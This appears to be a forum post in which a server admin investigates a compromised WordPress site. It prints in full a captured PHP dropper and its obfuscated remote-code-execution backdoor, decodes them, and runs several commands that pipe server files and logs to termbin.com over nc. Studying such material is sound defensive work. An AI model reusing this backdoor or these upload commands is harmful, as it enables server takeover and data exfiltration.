- Apr 25, 2015
- 1,845
- 2
- 2,199
- 327
First, what am I doing?
Taking this off to another machine for inspection, volatile data:
Okay, now I am not a dumb mother fuXXr - right? I know to grep for "decode" among "eval" and other kiddo commands.
So, I am looking at wp-craft-report-site.php with the base64. Let's decode?
Base64 decodes to:
Awesome, more obfuscation.
Now we want to turn all these damn chr(1337)s to their actual character. Cool! Nice site over here does this stuff for us: https://www.plus2net.com/php_tutorial/string-chr.php
This is going to get fucking dumb.
Time 2 code PHP to create a bash script for us, lmao.. because fuck this.
Over here http://www.writephponline.com/ I am going to execute:
Write your php you want to decode into a decode.txt file!
We can generate this by modifying:
Ghetttttoo PHP shytufff for fun, woo.
Results?
Just about every usage of "." is for combining the chr(1).chr(2) shit. Know what I should have done first? Remove "." anywhere between ) and c, fuck. Regex for the win.
I don't have patience for regex, so I am using Notepad++ to search for and replace "." with "" nothing.
Apparently Ben from Sucuri already found this shit:
labs.sucuri.net
I found a piece of this artifact over at:
What about running processes?
Pay close attention to this Feb04/05/06 shit.. hmm. kk
cd /var/log
Now who has logged in?
Nice m8, but what about inside of the zipped files?
Hey, fuck you UDP protocol packet fuqqer.
-rw-r--r-- 1 www-data www-data 3.3K Feb 3 16:09 mn
We have a timeframe of Feb 3 our compromise began.
Now since I know this attack happened around a specific time, I can scrape my logs around then:
We know this hit my Apache server, so let's cd in there before running the above? "cd /var/log/apache2".. then run above.
This fuqqer infected me last time, and I overlooked this infection clearing it off.
See this bullshit?
Now we know Dec 10 17:07 is a time of interest..
I am tracing this attack back to Cloudflare, but this is not Cloudflare's fault, this is my own damn fault for not enabling the Cloudflare module to have the attacker's real fuqqqking IP logged. I know they're around/from Germany/Netherlands/Europe region though since their location of the CDN is that direction.
So I am going to grep for "172.69" and "162.158"
...
zgrep -a "10/Dec/2019:17:0" *gz | grep "172.69"
and
zgrep -a "10/Dec/2019:17:0" *gz | grep "162.158"
I am obviously going to add | nc termbin.com 9999
To exfil these logs.
What does this shit mean? I traced this all the way back to an Adminer exploit. Someone left an unpatched Adminer on the system *cough cough, not me.. totally was me*. Ah well, we all fk up sometimes.
Evidence not to leave tools floating around public-facing.. dddaaaayummmiittttt h00000m0000000z stoooop hacccckking me lol
Code:
cd /tmp/
cat * | nc termbin.com 9999Taking this off to another machine for inspection, volatile data:
Code:
a:2:{s:14:"162.158.89.172";a:2:{i:0;i:1577805458;i:1;i:1;}s:14:"162.158.91.230";a:2:{i:0;i:1577805459;i:1;i:1;}}<?php echo ":#009009#:";
$file_to_search = "sitemap.xml";
$dop = $_GET['ptz'];
@search_file($_SERVER['DOCUMENT_ROOT'].$dop,$file_to_search);
function search_file($dir,$file_to_search){
$search_array = array();
$files = scandir($dir);
foreach($files as $key => $value){
$path = realpath($dir.DIRECTORY_SEPARATOR.$value);
if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false) {
$sitename = get_sitename($path);
if($sitename != "null") {
if (!array_key_exists($sitename, $search_array)) {
$st = make_sh_site(dirname($path),$sitename);
array_push($search_array, $sitename);
}
}
}
} else if($value != "." && $value != "..") {
search_file($path, $file_to_search);
}
}
}
function get_sitename($file) {
$g = file_get_contents($file);
if (strpos($g,"<loc>") !== false) {
preg_match('/<loc>(.*?)<\/loc>/s', $g, $matches, PREG_OFFSET_CAPTURE);
$siten = $matches[1][0];
$siten_t = str_replace("://","@",$siten);
$pieces = explode("/", $siten_t);
$siten_t3 = str_replace("@","://",$pieces[0]);
return $siten_t3;
}
return "null";
}
function make_sh_site($dir,$site_name) {
@file_put_contents($dir."/wp-craft-report-site.php",base64_decode('PD9waHAgaWYoaXNzZXQoJF9QT1NUW2Nocig5NykuY2hyKDExNSkuY2hyKDk3KS5jaHIoMTE4KS5jaHIoMTE1KS5jaHIoMTAwKS5jaHIoMTE4KS5jaHIoMTAwKS5jaHIoMTE1KV0pICYmIG1kNSgkX1BPU1RbY2hyKDEwOCkuY2hyKDEwMykuY2hyKDEwNykuY2hyKDEwMikuY2hyKDEwMykuY2hyKDEwNCkuY2hyKDEwMCkuY2hyKDEwMikuY2hyKDEwNCldKSA9PSBjaHIoMTAxKS5jaHIoNTcpLmNocig1NSkuY2hyKDU2KS5jaHIoNTUpLmNocig5NykuY2hyKDEwMCkuY2hyKDk5KS5jaHIoNTMpLmNocig1MCkuY2hyKDU1KS5jaHIoNDkpLmNocig5OSkuY2hyKDk4KS5jaHIoNDgpLmNocigxMDIpLmNocig1NSkuY2hyKDU0KS5jaHIoNTMpLmNocig1MCkuY2hyKDU3KS5jaHIoNTIpLmNocig1MykuY2hyKDQ4KS5jaHIoNTEpLmNocigxMDApLmNocig5NykuY2hyKDUxKS5jaHIoMTAyKS5jaHIoNTApLmNocigxMDApLmNocig5OSkpIHsgJGEgPSBjaHIoMTA5KS5jaHIoMTEwKTsgCSRuMSA9IGNocigxMDIpLmNocigxMDUpLmNocigxMDgpLmNocigxMDEpLmNocig5NSk7JG4yID0gY2hyKDExMikuY2hyKDExNykuY2hyKDExNikuY2hyKDk1KTskbjMgPSAkbjEuJG4yLmNocig5OSkuY2hyKDExMSkuY2hyKDExMCkuY2hyKDExNikuY2hyKDEwMSkuY2hyKDExMCkuY2hyKDExNikuY2hyKDExNSk7JGIxID0gY2hyKDEwMCkuY2hyKDEwMSkuY2hyKDk5KS5jaHIoMTExKS5jaHIoMTAwKS5jaHIoMTAxKTskYjIgPSBjaHIoOTgpLmNocig5NykuY2hyKDExNSkuY2hyKDEwMSkuY2hyKDU0KS5jaHIoNTIpLmNocig5NSkuJGIxOyAJJHoxID0gY2hyKDYwKS5jaHIoNjMpLmNocigxMTIpLmNocigxMDQpLmNocigxMTIpLmNocigzMik7IAkkejIgPSAkejEuJGIyKCRfUkVRVUVTVFtjaHIoMTAwKS5jaHIoNDkpXSk7IAkkejMgPSAkYjIoJF9SRVFVRVNUW2NocigxMDApLmNocig0OSldKTsgCUAkbjMoJGEsJHoyKTsgCUBpbmNsdWRlKCRhKTtAdW5saW5rKCRhKTsgCSRhID0gY2hyKDQ3KS5jaHIoMTE2KS5jaHIoMTA5KS5jaHIoMTEyKS5jaHIoNDcpLiRhOyAJQCRuMygkYSwkejIpOyAJQGluY2x1ZGUoJGEpO0B1bmxpbmsoJGEpO2RpZSgpOyAgfSBlbHNlIHsgJGNiYiA9IGNocig5OCkuY2hyKDk3KS5jaHIoMTE1KS5jaHIoMTAxKS5jaHIoNTQpLmNocig1MikuY2hyKDk1KS5jaHIoMTAwKS5jaHIoMTAxKS5jaHIoOTkpLmNocigxMTEpLmNocigxMDApLmNocigxMDEpOyBlY2hvICRjYmIoY2hyKDc4KS5jaHIoNjgpLmNocig2NSkuY2hyKDQ4KS5jaHIoNzYpLmNocig4MykuY2hyKDQ5KS5jaHIoMTA4KS5jaHIoOTkpLmNocigxMTApLmNocig3NCkuY2hyKDExOCkuY2hyKDk5KS5jaHIoMTAzKS5jaHIoNjEpLmNocig2MSkpOyB9'));
$r = @file_get_contents($site_name."/wp-craft-report-site.php");
if(strpos($r,"404--error") !== false){
echo $site_name."/wp-craft-report-site.php<#>";
return;
}
return $site_name;
}
echo "#already exist#:";Okay, now I am not a dumb mother fuXXr - right? I know to grep for "decode" among "eval" and other kiddo commands.
So, I am looking at wp-craft-report-site.php with the base64. Let's decode?
Code:
PD9waHAgaWYoaXNzZXQoJF9QT1NUW2Nocig5NykuY2hyKDExNSkuY2hyKDk3KS5jaHIoMTE4KS5jaHIoMTE1KS5jaHIoMTAwKS5jaHIoMTE4KS5jaHIoMTAwKS5jaHIoMTE1KV0pICYmIG1kNSgkX1BPU1RbY2hyKDEwOCkuY2hyKDEwMykuY2hyKDEwNykuY2hyKDEwMikuY2hyKDEwMykuY2hyKDEwNCkuY2hyKDEwMCkuY2hyKDEwMikuY2hyKDEwNCldKSA9PSBjaHIoMTAxKS5jaHIoNTcpLmNocig1NSkuY2hyKDU2KS5jaHIoNTUpLmNocig5NykuY2hyKDEwMCkuY2hyKDk5KS5jaHIoNTMpLmNocig1MCkuY2hyKDU1KS5jaHIoNDkpLmNocig5OSkuY2hyKDk4KS5jaHIoNDgpLmNocigxMDIpLmNocig1NSkuY2hyKDU0KS5jaHIoNTMpLmNocig1MCkuY2hyKDU3KS5jaHIoNTIpLmNocig1MykuY2hyKDQ4KS5jaHIoNTEpLmNocigxMDApLmNocig5NykuY2hyKDUxKS5jaHIoMTAyKS5jaHIoNTApLmNocigxMDApLmNocig5OSkpIHsgJGEgPSBjaHIoMTA5KS5jaHIoMTEwKTsgCSRuMSA9IGNocigxMDIpLmNocigxMDUpLmNocigxMDgpLmNocigxMDEpLmNocig5NSk7JG4yID0gY2hyKDExMikuY2hyKDExNykuY2hyKDExNikuY2hyKDk1KTskbjMgPSAkbjEuJG4yLmNocig5OSkuY2hyKDExMSkuY2hyKDExMCkuY2hyKDExNikuY2hyKDEwMSkuY2hyKDExMCkuY2hyKDExNikuY2hyKDExNSk7JGIxID0gY2hyKDEwMCkuY2hyKDEwMSkuY2hyKDk5KS5jaHIoMTExKS5jaHIoMTAwKS5jaHIoMTAxKTskYjIgPSBjaHIoOTgpLmNocig5NykuY2hyKDExNSkuY2hyKDEwMSkuY2hyKDU0KS5jaHIoNTIpLmNocig5NSkuJGIxOyAJJHoxID0gY2hyKDYwKS5jaHIoNjMpLmNocigxMTIpLmNocigxMDQpLmNocigxMTIpLmNocigzMik7IAkkejIgPSAkejEuJGIyKCRfUkVRVUVTVFtjaHIoMTAwKS5jaHIoNDkpXSk7IAkkejMgPSAkYjIoJF9SRVFVRVNUW2NocigxMDApLmNocig0OSldKTsgCUAkbjMoJGEsJHoyKTsgCUBpbmNsdWRlKCRhKTtAdW5saW5rKCRhKTsgCSRhID0gY2hyKDQ3KS5jaHIoMTE2KS5jaHIoMTA5KS5jaHIoMTEyKS5jaHIoNDcpLiRhOyAJQCRuMygkYSwkejIpOyAJQGluY2x1ZGUoJGEpO0B1bmxpbmsoJGEpO2RpZSgpOyAgfSBlbHNlIHsgJGNiYiA9IGNocig5OCkuY2hyKDk3KS5jaHIoMTE1KS5jaHIoMTAxKS5jaHIoNTQpLmNocig1MikuY2hyKDk1KS5jaHIoMTAwKS5jaHIoMTAxKS5jaHIoOTkpLmNocigxMTEpLmNocigxMDApLmNocigxMDEpOyBlY2hvICRjYmIoY2hyKDc4KS5jaHIoNjgpLmNocig2NSkuY2hyKDQ4KS5jaHIoNzYpLmNocig4MykuY2hyKDQ5KS5jaHIoMTA4KS5jaHIoOTkpLmNocigxMTApLmNocig3NCkuY2hyKDExOCkuY2hyKDk5KS5jaHIoMTAzKS5jaHIoNjEpLmNocig2MSkpOyB9Base64 decodes to:
Code:
<?php if(isset($_POST[chr(97).chr(115).chr(97).chr(118).chr(115).chr(100).chr(118).chr(100).chr(115)]) && md5($_POST[chr(108).chr(103).chr(107).chr(102).chr(103).chr(104).chr(100).chr(102).chr(104)]) == chr(101).chr(57).chr(55).chr(56).chr(55).chr(97).chr(100).chr(99).chr(53).chr(50).chr(55).chr(49).chr(99).chr(98).chr(48).chr(102).chr(55).chr(54).chr(53).chr(50).chr(57).chr(52).chr(53).chr(48).chr(51).chr(100).chr(97).chr(51).chr(102).chr(50).chr(100).chr(99)) { $a = chr(109).chr(110); $n1 = chr(102).chr(105).chr(108).chr(101).chr(95);$n2 = chr(112).chr(117).chr(116).chr(95);$n3 = $n1.$n2.chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$b1 = chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$b2 = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).$b1; $z1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32); $z2 = $z1.$b2($_REQUEST[chr(100).chr(49)]); $z3 = $b2($_REQUEST[chr(100).chr(49)]); @$n3($a,$z2); @include($a);@unlink($a); $a = chr(47).chr(116).chr(109).chr(112).chr(47).$a; @$n3($a,$z2); @include($a);@unlink($a);die(); } else { $cbb = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101); echo $cbb(chr(78).chr(68).chr(65).chr(48).chr(76).chr(83).chr(49).chr(108).chr(99).chr(110).chr(74).chr(118).chr(99).chr(103).chr(61).chr(61)); }Awesome, more obfuscation.
Now we want to turn all these damn chr(1337)s to their actual character. Cool! Nice site over here does this stuff for us: https://www.plus2net.com/php_tutorial/string-chr.php
This is going to get fucking dumb.
Time 2 code PHP to create a bash script for us, lmao.. because fuck this.
Over here http://www.writephponline.com/ I am going to execute:
PHP:
<?php
$i=0;
echo "<table><tr><td>";
for($i==0;$i<=127;$i++){
echo " chr($i) = ".chr($i)."<br>";
if($i%20 == 0 and $i>19){echo "</td><td valign=top>";}
}
echo "</td></table>";
?>Write your php you want to decode into a decode.txt file!
We can generate this by modifying:
Code:
sed -i 's/chr(0)//g' ./decode.txt
sed -i 's/chr(1)//g' ./decode.txt
sed -i 's/chr(2)//g' ./decode.txt
sed -i 's/chr(3)//g' ./decode.txt
sed -i 's/chr(4)//g' ./decode.txt
sed -i 's/chr(5)//g' ./decode.txt
sed -i 's/chr(6)//g' ./decode.txt
sed -i 's/chr(7)//g' ./decode.txt
sed -i 's/chr(8)//g' ./decode.txt
sed -i 's/chr(9)/ /g' ./decode.txt
sed -i 's/chr(10)/ /g' ./decode.txt
sed -i 's/chr(11)//g' ./decode.txt
sed -i 's/chr(12)//g' ./decode.txt
sed -i 's/chr(13)/ /g' ./decode.txt
sed -i 's/chr(14)//g' ./decode.txt
sed -i 's/chr(15)//g' ./decode.txt
sed -i 's/chr(16)//g' ./decode.txt
sed -i 's/chr(17)//g' ./decode.txt
sed -i 's/chr(18)//g' ./decode.txt
sed -i 's/chr(19)//g' ./decode.txt
sed -i 's/chr(20)//g' ./decode.txt
sed -i 's/chr(21)//g' ./decode.txt
sed -i 's/chr(22)//g' ./decode.txt
sed -i 's/chr(23)//g' ./decode.txt
sed -i 's/chr(24)//g' ./decode.txt
sed -i 's/chr(25)//g' ./decode.txt
sed -i 's/chr(26)//g' ./decode.txt
sed -i 's/chr(27)//g' ./decode.txt
sed -i 's/chr(28)//g' ./decode.txt
sed -i 's/chr(29)//g' ./decode.txt
sed -i 's/chr(30)//g' ./decode.txt
sed -i 's/chr(31)//g' ./decode.txt
sed -i 's/chr(32)/ /g' ./decode.txt
sed -i 's/chr(33)/!/g' ./decode.txt
sed -i 's/chr(34)/"/g' ./decode.txt
sed -i 's/chr(35)/#/g' ./decode.txt
sed -i 's/chr(36)/$/g' ./decode.txt
sed -i 's/chr(37)/%/g' ./decode.txt
sed -i 's/chr(38)/&/g' ./decode.txt
sed -i 's/chr(39)/'/g' ./decode.txt
sed -i 's/chr(40)/(/g' ./decode.txt
sed -i 's/chr(41)/)/g' ./decode.txt
sed -i 's/chr(42)/*/g' ./decode.txt
sed -i 's/chr(43)/+/g' ./decode.txt
sed -i 's/chr(44)/,/g' ./decode.txt
sed -i 's/chr(45)/-/g' ./decode.txt
sed -i 's/chr(46)/./g' ./decode.txt
sed -i 's/chr(47)///g' ./decode.txt
sed -i 's/chr(48)/0/g' ./decode.txt
sed -i 's/chr(49)/1/g' ./decode.txt
sed -i 's/chr(50)/2/g' ./decode.txt
sed -i 's/chr(51)/3/g' ./decode.txt
sed -i 's/chr(52)/4/g' ./decode.txt
sed -i 's/chr(53)/5/g' ./decode.txt
sed -i 's/chr(54)/6/g' ./decode.txt
sed -i 's/chr(55)/7/g' ./decode.txt
sed -i 's/chr(56)/8/g' ./decode.txt
sed -i 's/chr(57)/9/g' ./decode.txt
sed -i 's/chr(58)/:/g' ./decode.txt
sed -i 's/chr(59)/;/g' ./decode.txt
sed -i 's/chr(62)/>/g' ./decode.txt
sed -i 's/chr(63)/?/g' ./decode.txt
sed -i 's/chr(64)/@/g' ./decode.txt
sed -i 's/chr(65)/A/g' ./decode.txt
sed -i 's/chr(66)/B/g' ./decode.txt
sed -i 's/chr(67)/C/g' ./decode.txt
sed -i 's/chr(68)/D/g' ./decode.txt
sed -i 's/chr(69)/E/g' ./decode.txt
sed -i 's/chr(70)/F/g' ./decode.txt
sed -i 's/chr(71)/G/g' ./decode.txt
sed -i 's/chr(72)/H/g' ./decode.txt
sed -i 's/chr(73)/I/g' ./decode.txt
sed -i 's/chr(74)/J/g' ./decode.txt
sed -i 's/chr(75)/K/g' ./decode.txt
sed -i 's/chr(76)/L/g' ./decode.txt
sed -i 's/chr(77)/M/g' ./decode.txt
sed -i 's/chr(78)/N/g' ./decode.txt
sed -i 's/chr(79)/O/g' ./decode.txt
sed -i 's/chr(80)/P/g' ./decode.txt
sed -i 's/chr(81)/Q/g' ./decode.txt
sed -i 's/chr(82)/R/g' ./decode.txt
sed -i 's/chr(83)/S/g' ./decode.txt
sed -i 's/chr(84)/T/g' ./decode.txt
sed -i 's/chr(85)/U/g' ./decode.txt
sed -i 's/chr(86)/V/g' ./decode.txt
sed -i 's/chr(87)/W/g' ./decode.txt
sed -i 's/chr(88)/X/g' ./decode.txt
sed -i 's/chr(89)/Y/g' ./decode.txt
sed -i 's/chr(90)/Z/g' ./decode.txt
sed -i 's/chr(91)/[/g' ./decode.txt
sed -i 's/chr(92)/\/g' ./decode.txt
sed -i 's/chr(93)/]/g' ./decode.txt
sed -i 's/chr(94)/^/g' ./decode.txt
sed -i 's/chr(95)/_/g' ./decode.txt
sed -i 's/chr(96)/`/g' ./decode.txt
sed -i 's/chr(97)/a/g' ./decode.txt
sed -i 's/chr(98)/b/g' ./decode.txt
sed -i 's/chr(99)/c/g' ./decode.txt
sed -i 's/chr(100)/d/g' ./decode.txt
sed -i 's/chr(101)/e/g' ./decode.txt
sed -i 's/chr(102)/f/g' ./decode.txt
sed -i 's/chr(103)/g/g' ./decode.txt
sed -i 's/chr(104)/h/g' ./decode.txt
sed -i 's/chr(105)/i/g' ./decode.txt
sed -i 's/chr(106)/j/g' ./decode.txt
sed -i 's/chr(107)/k/g' ./decode.txt
sed -i 's/chr(108)/l/g' ./decode.txt
sed -i 's/chr(109)/m/g' ./decode.txt
sed -i 's/chr(110)/n/g' ./decode.txt
sed -i 's/chr(111)/o/g' ./decode.txt
sed -i 's/chr(112)/p/g' ./decode.txt
sed -i 's/chr(113)/q/g' ./decode.txt
sed -i 's/chr(114)/r/g' ./decode.txt
sed -i 's/chr(115)/s/g' ./decode.txt
sed -i 's/chr(116)/t/g' ./decode.txt
sed -i 's/chr(117)/u/g' ./decode.txt
sed -i 's/chr(118)/v/g' ./decode.txt
sed -i 's/chr(119)/w/g' ./decode.txt
sed -i 's/chr(120)/x/g' ./decode.txt
sed -i 's/chr(121)/y/g' ./decode.txt
sed -i 's/chr(122)/z/g' ./decode.txt
sed -i 's/chr(123)/{/g' ./decode.txt
sed -i 's/chr(124)/|/g' ./decode.txt
sed -i 's/chr(125)/}/g' ./decode.txt
sed -i 's/chr(126)/~/g' ./decode.txt
sed -i 's/chr(127)//g' ./decode.txt
Code:
<?php
$i=0;
for($i==0;$i<=127;$i++){
echo "sed -i 's/chr($i)/".chr($i)."/g' ./decode.txt<br>";
if($i%20 == 0 and $i>19){echo "</td><td valign=top>";}
}
echo "</td></table>";
?>Ghetttttoo PHP shytufff for fun, woo.
Results?
Code:
cat decode.txt
<?php if(isset($_POST[a.s.a.v.s.d.v.d.s]) && md5($_POST[l.g.k.f.g.h.d.f.h]) == e.9.7.8.7.a.d.c.5.2.7.1.c.b.0.f.7.6.5.2.9.4.5.0.3.d.a.3.f.2.d.c) { $a = m.n; $n1 = f.i.l.e._;$n2 = p.u.t._;$n3 = $n1.$n2.c.o.n.t.e.n.t.s;$b1 = d.e.c.o.d.e;$b2 = b.a.s.e.6.4._.$b1; $z1 = chr(60).?.p.h.p. ; $z2 = $z1.$b2($_REQUEST[d.1]); $z3 = $b2($_REQUEST[d.1]); @$n3($a,$z2); @include($a);@unlink($a); $a = chr(47).t.m.p.chr(47).$a; @$n3($a,$z2); @include($a);@unlink($a);die(); } else { $cbb = b.a.s.e.6.4._.d.e.c.o.d.e; echo $cbb(N.D.A.0.L.S.1.l.c.n.J.v.c.g.chr(61).chr(61)); }Just about every usage of "." is for combining the chr(1).chr(2) shit. Know what I should have done first? Remove "." anywhere between ) and c, fuck. Regex for the win.
I don't have patience for regex, so I am using Notepad++ to search for and replace "." with "" nothing.
Code:
<?php if(isset($_POST[asavsdvds]) && md5($_POST[lgkfghdfh]) == e9787adc5271cb0f765294503da3f2dc) { $a = mn; $n1 = file_;$n2 = put_;$n3 = $n1$n2contents;$b1 = decode;$b2 = base64_$b1; $z1 = chr(60)?php ; $z2 = $z1$b2($_REQUEST[d1]); $z3 = $b2($_REQUEST[d1]); @$n3($a,$z2); @include($a);@unlink($a); $a = chr(47)tmpchr(47)$a; @$n3($a,$z2); @include($a);@unlink($a);die(); } else { $cbb = base64_decode; echo $cbb(NDA0LS1lcnJvcgchr(61)chr(61)); }Apparently Ben from Sucuri already found this shit:
Backdoor Found in Compromised WordPress Environment
Our researcher describes a backdoor in a compromised WordPress installation that had been injected into the header.php file in the theme directory.
labs.sucuri.net
I found a piece of this artifact over at:
Code:
./wp-content/cache/supercache/MY_CLIENTS_WEB_DOMAIN.com/wp-craft-report.phpWhat about running processes?
Code:
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 2019 ? 00:02:34 init [2]
root 2 0 0 2019 ? 00:00:00 [kthreadd]
root 3 2 0 2019 ? 00:06:41 [ksoftirqd/0]
root 5 2 0 2019 ? 00:00:00 [kworker/u:0]
root 6 2 0 2019 ? 00:00:00 [migration/0]
root 7 2 0 2019 ? 00:01:07 [watchdog/0]
root 8 2 0 2019 ? 00:00:00 [cpuset]
root 9 2 0 2019 ? 00:00:00 [khelper]
root 10 2 0 2019 ? 00:00:00 [kdevtmpfs]
root 11 2 0 2019 ? 00:00:00 [netns]
root 12 2 0 2019 ? 00:00:33 [sync_supers]
root 13 2 0 2019 ? 00:00:00 [bdi-default]
root 14 2 0 2019 ? 00:00:00 [kintegrityd]
root 15 2 0 2019 ? 00:00:00 [kblockd]
root 17 2 0 2019 ? 00:00:05 [khungtaskd]
root 18 2 0 2019 ? 00:00:03 [kswapd0]
root 19 2 0 2019 ? 00:00:00 [vmstat]
root 20 2 0 2019 ? 00:00:00 [ksmd]
root 21 2 0 2019 ? 00:00:00 [khugepaged]
root 22 2 0 2019 ? 00:00:00 [fsnotify_mark]
root 23 2 0 2019 ? 00:00:00 [crypto]
root 84 2 0 2019 ? 00:00:00 [khubd]
root 94 2 0 2019 ? 00:00:00 [ata_sff]
root 110 2 0 2019 ? 00:00:00 [scsi_eh_0]
root 111 2 0 2019 ? 00:00:00 [scsi_eh_1]
root 118 2 0 2019 ? 00:00:00 [kworker/u:1]
root 140 2 0 2019 ? 00:03:28 [kjournald]
root 295 1 0 2019 ? 00:00:00 udevd --daemon
root 401 295 0 2019 ? 00:00:00 udevd --daemon
root 402 295 0 2019 ? 00:00:00 udevd --daemon
root 404 2 0 2019 ? 00:00:00 [kpsmoused]
root 418 2 0 2019 ? 00:23:01 [vballoon]
root 1812 1 0 2019 ? 00:11:54 /usr/sbin/rsyslogd -c5
root 1897 2 0 2019 ? 00:01:13 [flush-254:0]
root 1903 1 0 2019 ? 00:00:37 /usr/sbin/cron
root 2357 1 0 2019 ? 00:06:32 sendmail: MTA: accepting connections
root 2593 1 0 2019 ? 00:08:25 /usr/sbin/sshd
root 2617 1 0 2019 tty1 00:00:00 /sbin/getty 38400 tty1
root 2618 1 0 2019 tty2 00:00:00 /sbin/getty 38400 tty2
root 2619 1 0 2019 tty3 00:00:00 /sbin/getty 38400 tty3
root 2620 1 0 2019 tty4 00:00:00 /sbin/getty 38400 tty4
root 2621 1 0 2019 tty5 00:00:00 /sbin/getty 38400 tty5
root 2622 1 0 2019 tty6 00:00:00 /sbin/getty 38400 tty6
root 5321 1 0 2019 ? 00:00:00 /bin/sh /usr/bin/mysqld_safe
mysql 5648 5321 0 2019 ? 01:06:55 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
root 5649 5321 0 2019 ? 00:00:00 logger -t mysqld -p daemon.error
root 31247 1 0 Jan04 ? 00:02:37 /usr/sbin/apache2 -k start
www-data 23249 31247 0 Feb04 ? 00:00:14 /usr/sbin/apache2 -k start
www-data 24323 31247 0 Feb04 ? 00:00:10 /usr/sbin/apache2 -k start
www-data 27536 31247 0 Feb04 ? 00:00:10 /usr/sbin/apache2 -k start
www-data 27569 31247 0 Feb04 ? 00:00:11 /usr/sbin/apache2 -k start
www-data 27571 31247 0 Feb04 ? 00:00:09 /usr/sbin/apache2 -k start
www-data 27572 31247 0 Feb04 ? 00:00:08 /usr/sbin/apache2 -k start
www-data 27574 31247 0 Feb04 ? 00:00:11 /usr/sbin/apache2 -k start
www-data 27576 31247 0 Feb04 ? 00:00:11 /usr/sbin/apache2 -k start
www-data 27579 31247 0 Feb04 ? 00:00:10 /usr/sbin/apache2 -k start
www-data 29049 31247 0 Feb04 ? 00:00:07 /usr/sbin/apache2 -k start
root 16761 2 0 Feb05 ? 00:00:04 [kworker/0:0]
root 25372 2 0 Feb06 ? 00:00:02 [kworker/0:1]
root 13393 2593 0 13:43 ? 00:00:01 sshd: root@pts/0
root 13401 13393 0 13:43 pts/0 00:00:02 -bash
root 14266 13401 0 14:16 pts/0 00:00:00 mail
root 14371 13401 0 14:20 pts/0 00:00:00 ps -ef --sort=start_time
root 14372 13401 0 14:20 pts/0 00:00:00 nc termbin.com 9999Pay close attention to this Feb04/05/06 shit.. hmm. kk
cd /var/log
Now who has logged in?
Code:
grep -rnw './' -e 'Accepted password'Nice m8, but what about inside of the zipped files?
Code:
root@vps91709:/var/log# zgrep -a Feb *gz | grep -v "root" | grep -v "sendmail" | grep -v "STARTTLS" | grep -v "localhost" | grep -v "CUSTOMER_NAME_HERE" | grep -v "mailer" | grep "kernel"
syslog.3.gz:Feb 4 12:56:34 vps91709 kernel: [11316599.087732] UDP: bad checksum. From 51.255.109.163:53592 to 158.69.206.75:5060 ulen 237Hey, fuck you UDP protocol packet fuqqer.
-rw-r--r-- 1 www-data www-data 3.3K Feb 3 16:09 mn
We have a timeframe of Feb 3 our compromise began.
Now since I know this attack happened around a specific time, I can scrape my logs around then:
Code:
cat * | grep "03/Feb/2020:16:09" | nc termbin.com 9999We know this hit my Apache server, so let's cd in there before running the above? "cd /var/log/apache2".. then run above.
Code:
162.158.74.102 - - [03/Feb/2020:16:09:19 -0500] "GET / HTTP/1.1" 200 6634 "-" "-"
108.162.216.45 - - [03/Feb/2020:16:09:20 -0500] "GET / HTTP/1.1" 200 6630 "-" "-"
162.158.74.246 - - [03/Feb/2020:16:09:21 -0500] "GET / HTTP/1.1" 200 6653 "-" "-"
108.162.216.81 - - [03/Feb/2020:16:09:21 -0500] "GET / HTTP/1.1" 200 6638 "-" "-"
141.101.77.11 - - [03/Feb/2020:16:09:18 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 500 277 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
108.162.216.131 - - [03/Feb/2020:16:09:23 -0500] "GET / HTTP/1.1" 200 6646 "-" "-"
162.158.74.134 - - [03/Feb/2020:16:09:23 -0500] "GET / HTTP/1.1" 200 6638 "-" "-"
162.158.74.250 - - [03/Feb/2020:16:09:24 -0500] "GET / HTTP/1.1" 200 6631 "-" "-"
162.158.74.66 - - [03/Feb/2020:16:09:24 -0500] "GET / HTTP/1.1" 200 6641 "-" "-"
141.101.77.11 - - [03/Feb/2020:16:09:22 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz= HTTP/1.1" 500 277 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
::1 - - [03/Feb/2020:16:09:30 -0500] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.2.22 (Debian) (internal dummy connection)"
::1 - - [03/Feb/2020:16:09:31 -0500] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.2.22 (Debian) (internal dummy connection)"
172.69.55.79 - - [03/Feb/2020:16:09:36 -0500] "GET /wp-login.php HTTP/1.1" 200 2265 "-" "Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18"
172.69.55.79 - - [03/Feb/2020:16:09:36 -0500] "POST /wp-login.php HTTP/1.1" 200 2659 "-" "Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18"
141.101.104.224 - - [03/Feb/2020:16:09:25 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/../.. HTTP/1.1" 500 261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
172.69.55.163 - - [03/Feb/2020:16:09:56 -0500] "POST /wp-content/uploads/2019/12/wp-simple-plugin.php?ptz=/.. HTTP/1.1" 500 277 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
